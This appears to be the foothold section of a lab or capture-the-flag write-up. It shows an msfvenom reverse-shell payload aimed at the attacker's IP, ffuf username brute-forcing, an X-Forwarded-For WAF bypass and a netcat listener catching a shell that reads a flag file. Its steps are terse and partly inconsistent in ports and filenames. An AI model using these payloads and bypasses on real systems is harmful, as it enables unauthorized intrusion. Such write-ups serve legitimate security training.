Foothold

❯ msfvenom -p linux/x64/shell/reverse_tcp LHOST=192.168.45.239 LPORT=13337 -f elf -o update.elf

[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes
Saved as: update.elf

❯ ffuf -X POST -d '{"user":"FUZZ", "url":"http://192.168.45.239/update.sh"}' -H 'Content-Type:application/json' -u http://192.168.214.134:13337/update -w /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --fs 17

Bruteforced a bunch of usernames but to no avail

Try to bypass the WAF by spoofing the origin of the request

'X-Forwarded-For: 127.0.0.1'

clumsyadmin

❯ curl http://192.168.214.134:13337/restart -X POST

❯ nc -lnvp 443
listening on [any] 443 ...
connect to [192.168.45.239] from (UNKNOWN) [192.168.214.134] 38020
whoami
clumsyadmin
cat /home/clumsyadmin/local.txt
93ea55ed661c9f851fe699c5c2fc6d8d
ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:bf:e3:d5 brd ff:ff:ff:ff:ff:ff
    inet 192.168.214.134/24 brd 192.168.214.255 scope global ens192
       valid_lft forever preferred_lft forever

Previous13337 NextPriv Esc

Last updated 1 year ago